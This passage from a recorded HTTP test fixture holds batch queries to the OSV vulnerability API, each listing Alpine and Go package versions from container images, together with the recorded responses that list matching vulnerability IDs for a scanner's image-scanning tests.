"1.22.4" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.22.4" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "openssl" }, "version": "3.3.1-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "openssl" }, "version": "3.3.1-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "musl" }, "version": "1.2.5-r0" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "musl" }, "version": "1.2.5-r0" }, { "package": { "ecosystem": "Go", "name": "ptf" }, "version": "(devel)" }, { "package": { "ecosystem": "Go", "name": "ptf" }, "version": "(devel)" }, { "package": { "ecosystem": "Go", "name": "ptf" }, "version": "(devel)" }, { "package": { "ecosystem": "Go", "name": "ptf" }, "version": "(devel)" }, { "package": { "ecosystem": "Go", "name": "ptf" }, "version": "(devel)" }, { "package": { "ecosystem": "Go", "name": "ptf" }, "version": "(devel)" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "pax-utils" }, "version": "1.3.7-r2" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "busybox" }, "version": "1.36.1-r29" }, { "package": { "ecosystem": "Alpine:v3.20", "name": "zlib" }, "version": "1.3.1-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_image_with_go_binary url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 15478 body: | { "results": [ {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "GO-2024-2963", "modified": "2026-02-04T03:37:39.895574Z" }, { "id": "GO-2024-3105", "modified": "2026-02-24T16:29:04.364011Z" }, { "id": "GO-2024-3106", "modified": "2026-02-24T16:29:04.606789Z" }, { "id": "GO-2024-3107", "modified": "2026-02-24T16:29:04.677030Z" }, { "id": "GO-2025-3373", "modified": "2026-02-17T16:13:53.362266Z" }, { "id": "GO-2025-3420", "modified": "2026-02-17T16:13:53.083304Z" }, { "id": "GO-2025-3447", "modified": "2026-02-04T04:23:04.020664Z" }, { "id": "GO-2025-3563", "modified": "2026-02-17T16:13:52.395126Z" }, { "id": "GO-2025-3750", "modified": "2026-02-04T03:28:12.135241Z" }, { "id": "GO-2025-3751", "modified": "2026-02-17T16:13:52.185280Z" }, { "id": "GO-2025-3849", "modified": "2026-02-04T02:26:50.866679Z" }, { "id": "GO-2025-3956", "modified": "2026-02-04T04:33:27.340869Z" }, { "id": "GO-2025-4006", "modified": "2026-02-17T16:13:53.018755Z" }, { "id": "GO-2025-4007", "modified": "2026-02-17T13:58:48.676604Z" }, { "id": "GO-2025-4008", "modified": "2026-02-17T13:58:48.077685Z" }, { "id": "GO-2025-4009", "modified": "2026-02-13T02:58:48.571208Z" }, { "id": "GO-2025-4010", "modified": "2026-02-13T21:28:48.362505Z" }, { "id": "GO-2025-4011", "modified": "2026-02-17T13:58:47.352598Z" }, { "id": "GO-2025-4012", "modified": "2026-02-17T13:58:47.721658Z" }, { "id": "GO-2025-4013", "modified": "2026-02-17T13:58:47.501939Z" }, { "id": "GO-2025-4014", "modified": "2026-03-18T11:44:08.816200Z" }, { "id": "GO-2025-4015", "modified": "2026-02-17T16:13:53.510662Z" }, { "id": "GO-2025-4155", "modified": "2026-03-18T11:44:08.473909Z" }, { "id": "GO-2025-4175", "modified": "2026-02-04T04:38:59.126121Z" }, { "id": "GO-2026-4337", "modified": "2026-03-18T11:44:08.657377Z" }, { "id": "GO-2026-4340", "modified": "2026-02-04T02:58:11.702669Z" }, { "id": "GO-2026-4341", "modified": "2026-03-18T11:44:08.749079Z" }, { "id": "GO-2026-4342", "modified": "2026-03-17T10:28:56.226379Z" }, { "id": "GO-2026-4403", "modified": "2026-02-06T09:40:56.765821Z" }, { "id": "GO-2026-4601", "modified": "2026-03-10T10:43:54.660319Z" }, { "id": "GO-2026-4602", "modified": "2026-03-10T10:43:54.463365Z" }, { "id": "GO-2026-4603", "modified": "2026-03-10T10:43:54.330461Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-12797", "modified": "2025-12-03T22:55:03.634026Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-15467", "modified": "2026-02-26T11:16:44.405477Z" }, { "id": "ALPINE-CVE-2025-15468", "modified": "2026-01-30T11:17:10.087231Z" }, { "id": "ALPINE-CVE-2025-66199", "modified": "2026-01-30T11:16:38.617961Z" }, { "id": "ALPINE-CVE-2025-68160", "modified": "2026-02-08T14:17:20.369697Z" }, { "id": "ALPINE-CVE-2025-69418", "modified": "2026-02-08T14:17:22.909725Z" }, { "id": "ALPINE-CVE-2025-69419", "modified": "2026-02-08T14:17:23.481787Z" }, { "id": "ALPINE-CVE-2025-69420", "modified": "2026-02-08T14:17:16.244540Z" }, { "id": "ALPINE-CVE-2025-69421", "modified": "2026-02-08T14:17:06.852172Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9231", "modified": "2025-12-03T23:00:26.184987Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" }, { "id": "ALPINE-CVE-2026-22795", "modified": "2026-02-08T14:17:23.817021Z" }, { "id": "ALPINE-CVE-2026-22796", "modified": "2026-02-08T14:17:23.708503Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-12797", "modified": "2025-12-03T22:55:03.634026Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-15467", "modified": "2026-02-26T11:16:44.405477Z" }, { "id": "ALPINE-CVE-2025-15468", "modified": "2026-01-30T11:17:10.087231Z" }, { "id": "ALPINE-CVE-2025-66199", "modified": "2026-01-30T11:16:38.617961Z" }, { "id": "ALPINE-CVE-2025-68160", "modified": "2026-02-08T14:17:20.369697Z" }, { "id": "ALPINE-CVE-2025-69418", "modified": "2026-02-08T14:17:22.909725Z" }, { "id": "ALPINE-CVE-2025-69419", "modified": "2026-02-08T14:17:23.481787Z" }, { "id": "ALPINE-CVE-2025-69420", "modified": "2026-02-08T14:17:16.244540Z" }, { "id": "ALPINE-CVE-2025-69421", "modified": "2026-02-08T14:17:06.852172Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9231", "modified": "2025-12-03T23:00:26.184987Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" }, { "id": "ALPINE-CVE-2026-22795", "modified": "2026-02-08T14:17:23.817021Z" }, { "id": "ALPINE-CVE-2026-22796", "modified": "2026-02-08T14:17:23.708503Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {} ] } headers: Content-Length: - "15478" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_insecure_alpine_image_with_detector_preset url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 136 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "136" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_insecure_alpine_image_with_specific_detector_disabled url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 136 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "136" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_insecure_alpine_image_with_specific_detector_enabled url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 136 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "136" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1907 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-baselayout" }, "version": "3.1.2-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "alpine-keys" }, "version": "2.1-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "apk-tools" }, "version": "2.10.6-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "ca-certificates" }, "version": "20191127-r2" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libc-dev" }, "version": "0.7.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "openssl" }, "version": "1.1.1k-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "libtls-standalone" }, "version": "2.9.1-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "musl" }, "version": "1.1.22-r4" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "pax-utils" }, "version": "1.2.3-r0" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "busybox" }, "version": "1.30.1-r5" }, { "package": { "ecosystem": "Alpine:v3.10", "name": "zlib" }, "version": "1.2.11-r1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/scanning_insecure_alpine_image_without_detectors url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 136 body: | { "results": [ {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-36159", "modified": "2025-12-03T22:50:23.251262Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "136" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 2344 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-baselayout" }, "version": "3.4.3-r2" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "apk-tools" }, "version": "2.14.0-r5" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "busybox" }, "version": "1.36.1-r15" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "ca-certificates" }, "version": "20230506-r0" }, { "package": { "ecosystem": "Alpine:v3.19", "name": "libc-dev" }, "version": 